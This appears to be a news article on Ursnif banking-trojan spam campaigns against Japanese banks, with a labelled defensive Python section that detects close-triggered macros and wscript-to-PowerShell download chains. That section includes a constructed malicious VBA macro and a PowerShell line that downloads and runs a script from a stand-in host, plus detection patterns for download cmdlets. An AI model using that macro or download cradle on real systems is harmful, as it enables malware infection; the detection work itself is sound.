Hackers have amplified Ursnif campaigns in Japan to include new targets and evasion techniques iStock

Attackers behind the Ursnif banking trojan have been stepping up spam campaigns in Japan to deliver the malware, security researchers have found. According to IBM's X-Force team, criminals have been using Ursnif, also known as Gozi, against banks in North America, Europe, Australia and Japan for years.

However, recent analysis of the malware shows that the threat actors have intensified attacks against Japanese banks and payment card providers since September 2017.

"Ursnif (aka Gozi) banking Trojan was the most active malware code in the financial sector in 2016 and has maintained its dominance through 2017 to date," Limor Kessem, executive security advisor for IBM, wrote in a blog post Thursday (26 October). "But one of its most popular targets in 2017 has been Japanese banks, where Ursnif's operators were very active in late Q3 2017, starting in September.

"In terms of targets, Ursnif malware configurations can be a mixed bag at times, but those targeting Japan are specific to banks and payment card providers in the country. That list of targets remained unchanged through the different campaigns, suggesting that the same actors are likely behind it."

However, recent samples of the malware indicate that the threat actors have expanded the campaign to "target user credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites."

To target Japanese users the attackers rely on the usual banking-trojan toolkit: grabbing data from within the victim's secure (HTTPS) banking sessions, web-injection attacks that alter the pages the victim sees, and page redirections, researchers said.

To deliver the Ursnif payload in Japan, the attackers send emails with malicious attachments that purport to come from Japanese financial services and payment card providers.

"In other malspam versions, users receive an HTML link that leads to an archive (.zip) file containing JavaScript, which launches a PowerShell script that fetches the payload from a remote server and infects the user with Ursnif," Kessem wrote. "The payload appears to be served from web resources the attackers registered to serve the malicious code, not from hijacked domains.

"Recent Ursnif malspam campaigns used a macro evasion technique that launches PowerShell only after the user closes the malicious file. This method helps the malware evade sandbox detection."
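Both delivery tricks described in the two quoted paragraphs above can be caught before the payload ever runs. The script below is an added example, written for this page and not taken from IBM X-Force or from any Ursnif sample: the first function splits a VBA macro into its procedures and reports when a launcher (PowerShell, WScript.Shell, encoded commands) lives in a close-time handler such as Document_Close or AutoClose, which is exactly the case a sandbox misses if it opens the document and never closes it; the second walks a list of process-creation events and flags a powershell.exe that downloads something and descends from wscript.exe (or another script or Office host), the .zip-to-JavaScript-to-PowerShell chain. The macro text, the process events, the path names and the host example.invalid are all constructed for the example, not captured data.

```python
"""Detection helpers for two Ursnif delivery tricks (added example, constructed inputs):
1. a VBA macro that launches PowerShell only from a close handler, so a sandbox
   that opens the file and never closes it sees no child process;
2. the .zip -> JavaScript (wscript.exe) -> PowerShell -> remote download chain.
"""
import re
from typing import Dict, List

# Auto-exec procedure names Office calls without user interaction. The close-time
# ones are what the sandbox-evasion trick relies on.
CLOSE_TRIGGERS = {"document_close", "autoclose", "auto_close", "workbook_beforeclose"}
OPEN_TRIGGERS = {"document_open", "autoopen", "auto_open", "workbook_open"}

# Tokens that mean "this macro starts something": hosts, download cmdlets,
# encoded PowerShell. Matched case-insensitively against each procedure body.
SUSPICIOUS_CALLS = re.compile(
    r"(powershell|wscript\.shell|shell\s*\(|createobject|downloadstring|downloadfile"
    r"|invoke-webrequest|iex\b|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)
PROC_RE = re.compile(
    r"^(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)", re.IGNORECASE | re.MULTILINE
)


def analyze_macro(vba: str) -> Dict[str, object]:
    """Return which procedures contain launcher code and whether any of them is
    a close-time auto-exec handler (the evasion described in the article)."""
    headers = list(PROC_RE.finditer(vba))
    findings = []
    for i, m in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(vba)
        body = vba[m.start():end]
        calls = sorted({c.group(0).lower() for c in SUSPICIOUS_CALLS.finditer(body)})
        if not calls:
            continue
        name = m.group(1).lower()
        trigger = "close" if name in CLOSE_TRIGGERS else "open" if name in OPEN_TRIGGERS else None
        findings.append({"procedure": m.group(1), "trigger": trigger, "calls": calls})
    return {
        "close_trigger_launcher": any(f["trigger"] == "close" for f in findings),
        "findings": findings,
    }


# Constructed macro: a harmless-looking Document_Open decoy and the real launcher
# in Document_Close. Variables("p") is a hypothetical stash for the encoded command.
MACRO = '''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    ' Decoy: nothing happens while a sandbox watches the open event
    ActiveDocument.Range.Text = "Please wait..."
End Sub

Private Sub Document_Close()
    Dim cmd As String
    cmd = "powershell -w hidden -enc " & ThisDocument.Variables("p").Value
    CreateObject("WScript.Shell").Run cmd, 0, False
End Sub
'''

# Process ancestry: a PowerShell that fetches something and descends from a
# script or Office host is the JavaScript-dropper chain; an admin's backup
# script started from Explorer is not.
DOWNLOAD_HINT = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|https?://)", re.I
)
LAUNCHERS = {"wscript.exe", "cscript.exe", "winword.exe", "excel.exe"}


def find_download_chains(events: List[Dict[str, object]]) -> List[List[str]]:
    """Return each launcher -> ... -> powershell.exe chain whose PowerShell
    command line looks like a remote download."""
    by_pid = {e["pid"]: e for e in events}
    chains = []
    for e in events:
        if e["image"].lower() != "powershell.exe" or not DOWNLOAD_HINT.search(e["cmdline"]):
            continue
        chain = [e["image"]]
        parent = by_pid.get(e["ppid"])
        while parent is not None:  # walk up until a known launcher or the root
            chain.append(parent["image"])
            if parent["image"].lower() in LAUNCHERS:
                chains.append(list(reversed(chain)))
                break
            parent = by_pid.get(parent["ppid"])
    return chains


# Constructed process-creation events (pid, parent pid, image, command line).
EVENTS = [
    {"pid": 400, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 512, "ppid": 400, "image": "wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\alice\\Downloads\\invoice.js"'},
    {"pid": 530, "ppid": 512, "image": "cmd.exe", "cmdline": "cmd.exe /c powershell ..."},
    {"pid": 548, "ppid": 530, "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/p.ps1')"},
    {"pid": 600, "ppid": 400, "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    print(analyze_macro(MACRO))
    print(find_download_chains(EVENTS))
```

The macro check is a triage heuristic on extracted VBA source (a tool such as olevba can dump it from the document); the process check assumes you already collect parent/child process events with command lines, as Sysmon event 1 or an EDR would. Treating a close handler as a first-class trigger is the point: a sandbox that only scores what happens after the file opens gives this sample a clean report.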

Researchers observed that the spam comes in cyclical weekly rounds: email volume typically peaks on Tuesday evenings, while attempted infections tend to spike on Thursdays and Fridays.

In other regions such as the UK, the attacks have used the RIG exploit kit to infect users through malvertising campaigns.

First discovered in 2007, Ursnif was operated by a closed group of criminals for online banking wire fraud in English-speaking countries. In 2010, however, the malware's source code was accidentally leaked, and other criminals repurposed it to build further trojans, among them Vawtrak (also known as Neverquest).

Besides North America, Australia and Japan, Ursnif has been targeting banks in Spain, Poland, Bulgaria and the Czech Republic in 2017. Over the past five years, Ursnif has been one of the most active banking trojans in Japan.

"The history of organized cybercrime in Japan is not very long," Kessem explained. "In most cases of malware migration, cybercriminal groups with adequate resources are looking for easier money, less security and an element of surprise for users who are less accustomed to their spam ploys and social engineering during the banking session."

"So why have other organized groups such as Dridex and TrickBot, both of which target banks in as many as 40 countries, largely stayed away from Japan? The answer could lie in the connections other gangs have with local cybercrime and money-laundering groups. Even on the internet, gangs often stick to their own turf."